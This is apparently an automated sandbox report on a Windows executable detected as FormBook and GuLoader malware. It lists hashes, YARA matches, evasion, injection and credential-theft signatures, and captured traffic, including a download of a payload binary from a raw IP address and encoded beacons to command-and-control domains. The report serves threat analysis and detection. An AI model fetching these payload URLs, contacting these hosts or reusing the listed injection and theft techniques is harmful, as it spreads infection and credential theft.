Windows Analysis Report
16042024124521.exe

Overview

General Information

Sample name: 16042024124521.exe
Analysis ID: 1426621
MD5: 56575888228a0c147ffc3ebd257dd628
SHA1: 8a97ce01e100c9e24a6b1ec2d83db98dca825d3e
SHA256: b0243eff8a4ce7a2d60b4a2af08adc2de364f1bce4e16ce1fb737d912d4088d3
Infos:

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Powershell drops PE file
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Dosfuscation Activity
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Source: http://pesterbdd.com/images/Pester.png URL Reputation: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://103.14.155.180/bwphkvcX154.bin Virustotal: Detection: 6% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\Kanels.exe Virustotal: Detection: 20% Perma Link
Multi AV Scanner detection for submitted file
Source: 16042024124521.exe Virustotal: Detection: 20% Perma Link
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Uses 32bit PE files
Source: 16042024124521.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 16042024124521.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2393562769.0000000007605000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdb source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: KQSYShJeqULXnPcQsI.exe, 0000000B.00000002.2877935687.0000000000FFE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: System.Core.pdbDZ source: powershell.exe, 00000001.00000002.2394936098.00000000081A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Kanels.exe, Kanels.exe, 00000007.00000002.2524990275.0000000022CA0000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000002.2524990275.0000000022E3E000.00000040.00001000.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2387303038.000000002294A000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2389301098.0000000022AF8000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, cmd.exe, 0000000C.00000002.2879225037.0000000003710000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe, 00000001.00000002.2393562769.0000000007613000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mshtml.pdbUGP source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp
Source: Binary string: cmd.pdb source: Kanels.exe, 00000007.00000002.2524696929.00000000229C0000.00000004.00000020.00020000.00000000.sdmp, Kanels.exe, 00000007.00000003.2443450040.0000000006FC5000.00000004.00000020.00020000.00000000.sdmp, KQSYShJeqULXnPcQsI.exe, 0000000B.00000003.2413829427.000000000110B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_004065C5 FindFirstFileW,FindClose, 0_2_004065C5
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00405990 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405990
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00402862 FindFirstFileW, 0_2_00402862
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_02D1B880 FindFirstFileW,FindNextFileW,FindClose, 12_2_02D1B880
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\sammentrkkenes\petrochemical\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Temp\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then xor eax, eax 12_2_02D09430
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 12_2_02D11DD0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 4x nop then pop edi 12_2_02D11DAF
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 103.14.155.180 103.14.155.180
Source: Joe Sandbox View IP Address: 217.160.0.183 217.160.0.183
Source: Joe Sandbox View IP Address: 112.175.50.218 112.175.50.218
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: unknown TCP traffic detected without corresponding DNS query: 103.14.155.180
Source: global traffic HTTP traffic detected: GET /bwphkvcX154.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 103.14.155.180Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /9pdo/?Nj=1XS0Y&1fd8thFH=DnYaRovP48GzkkJrYMXu2fP+AE8bpUHwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMVyf8d4q8oRy488on7FLg2VDUaCWqziINF2DU= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-usConnection: closeHost: www.ejbodyart.comUser-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4
Source: unknown DNS traffic detected: queries for: www.ejbodyart.com
Source: unknown HTTP traffic detected: POST /9pdo/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usContent-Type: application/x-www-form-urlencodedContent-Length: 205Connection: closeCache-Control: no-cacheHost: www.jt-berger.storeOrigin: http://www.jt-berger.storeReferer: http://www.jt-berger.store/9pdo/User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4Data Raw: 31 66 64 38 74 68 46 48 3d 77 39 2f 58 2f 5a 4c 35 36 72 61 5a 34 68 56 33 39 45 78 32 2f 70 45 76 31 45 53 4e 62 53 74 57 57 55 56 72 52 66 38 4f 48 36 44 43 68 41 76 2f 4c 6b 41 68 6c 62 58 49 33 4a 79 6b 6f 57 53 44 63 58 6b 31 37 46 4a 76 6a 66 42 6b 54 78 44 68 4e 6d 36 6d 2b 37 4b 69 44 39 70 47 77 35 75 31 6b 6c 36 34 66 77 6d 71 74 57 34 71 7a 39 32 53 42 6b 76 63 76 6d 78 6a 41 59 6f 61 43 63 4e 56 38 56 57 38 34 79 58 77 37 76 37 58 74 5a 58 57 68 30 66 47 52 73 6c 73 72 45 45 73 72 46 33 69 30 71 74 34 4d 50 46 2f 30 70 73 4e 74 30 70 79 5a 54 38 49 41 70 77 56 78 54 6a 76 78 51 70 6a 31 51 3d 3d Data Ascii: 1fd8thFH=w9/X/ZL56raZ4hV39Ex2/pEv1ESNbStWWUVrRf8OH6DChAv/LkAhlbXI3JykoWSDcXk17FJvjfBkTxDhNm6m+7KiD9pGw5u1kl64fwmqtW4qz92SBkvcvmxjAYoaCcNV8VW84yXw7v7XtZXWh0fGRslsrEEsrF3i0qt4MPF/0psNt0pyZT8IApwVxTjvxQpj1Q==
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 16 Apr 2024 10:25:50 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 63 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 39 70 64 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a 0d 0a Data Ascii: c7<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested URL /9pdo/ was not found on this server.<P></BODY></HTML>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 16 Apr 2024 10:26:06 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 16 Apr 2024 10:26:09 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Tue, 16 Apr 2024 10:26:12 GMTServer: ApacheContent-Encoding: gzipData Raw: 31 37 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f c3 30 0c be ef 57 98 70 4e b3 32 0e 5b d7 ee c0 36 09 a4 f1 10 14 01 c7 d0 ba 6b 44 9a 94 d4 a3 1b bf 9e b4 e3 2d c4 c9 4e f4 3d ec cf f1 c1 e2 72 9e 3e 5c 2d a1 a4 4a c3 d5 ed c9 ea 6c 0e 8c 0b 71 37 9a 0b b1 48 17 70 7f 9a 9e af 20 0c 86 90 3a 69 1a 45 ca 1a a9 85 58 5e b0 01 2b 89 ea 48 88 b6 6d 83 76 14 58 b7 16 e9 b5 d8 76 5a 61 47 7e 6f 39 7d 63 06 39 e5 6c 36 88 7b 43 2d cd 3a 61 68 18 6c 2b 1d fd 78 99 26 f9 43 3e 9c 4c 26 7b 55 af 01 71 89 32 f7 15 62 52 a4 b1 eb 60 e9 9c 75 70 3c 3c 06 0e 17 96 a0 b0 1b 93 77 10 f1 89 89 2b 24 09 99 35 84 86 12 46 b8 25 d1 8d 33 85 ac 94 ae 41 4a 36 54 f0 31 f3 a1 50 cd f1 79 a3 5e 12 36 df c3 79 ba ab b1 f3 86 5f 2a c6 f2 4c 66 25 fe 64 f5 5f bc b3 72 56 f7 23 8b f7 99 e3 47 9b ef a0 a1 9d c6 84 15 1e c0 0b 59 29 bd 8b a4 53 52 4f f7 16 65 f8 81 c8 ac b6 2e 3a 1c ca d1 d1 38 9b f6 f8 46 bd 62 e4 0f 83 d5 1e fd cf ea 65 d8 4f 5c 7f a8 7d f1 87 c1 f8 93 bf 50 08 fe 20 b8 c6 47 34 08 37 a8 08 e1 c9 1a 9f 13 18 95 95 04 6b 2c 7c 9a 68 a0 45 e7 4b d0 e7 5a 7b ed 58 74 eb f8 b3 f6 41 ce 06 6f 0c cc 0d 5b 59 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 173}QKO0WpN2[6kD-N=r>\-Jlq7Hp :iEX^+HmvXvZaG~o9}c9l6{C-:ahl+x&C>L&{Uq2bR`up<<w+$5F%3AJ6T1Py^6y_*Lf%d_rV#GY)SROe.:8FbeO\}P G47k,|hEKZ{XtAo[Y0
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.bin
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.binG
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.binY
Source: Kanels.exe, 00000007.00000002.2510599544.0000000006F6C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.14.155.180/bwphkvcX154.binx
Source: powershell.exe, 00000001.00000002.2393562769.00000000075BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000001.00000002.2393562769.00000000075FA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft
Source: 16042024124521.exe, 00000000.00000002.1657897984.000000000040A000.00000004.00000001.01000000.00000003.sdmp, 16042024124521.exe, 00000000.00000000.1635365176.000000000040A000.00000008.00000001.01000000.00000003.sdmp, Kanels.exe, 00000007.00000000.2228874024.000000000040A000.00000008.00000001.01000000.00000009.sdmp String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2388863811.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2388863811.00000000049A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2388863811.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: Kanels.exe, 00000007.00000001.2229815753.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Kanels.exe, 00000007.00000001.2229815753.00000000005F2000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: powershell.exe, 00000001.00000002.2388863811.00000000049A1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2388863811.0000000004AF6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: Kanels.exe, 00000007.00000001.2229815753.0000000000649000.00000020.00000001.01000000.0000000A.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: cmd.exe, 0000000C.00000003.2715835677.0000000008036000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: powershell.exe, 00000001.00000002.2390732857.0000000005A0B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Contains functionality for read data from the clipboard
Source: C:\Users\user\Desktop\16042024124521.exe Code function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_00405425

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 0000000C.00000002.2877363620.0000000002D00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.2880110378.00000000057F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2526300965.0000000022FF0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2524616734.0000000022980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877853079.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.2877768736.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2878696007.0000000003000000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
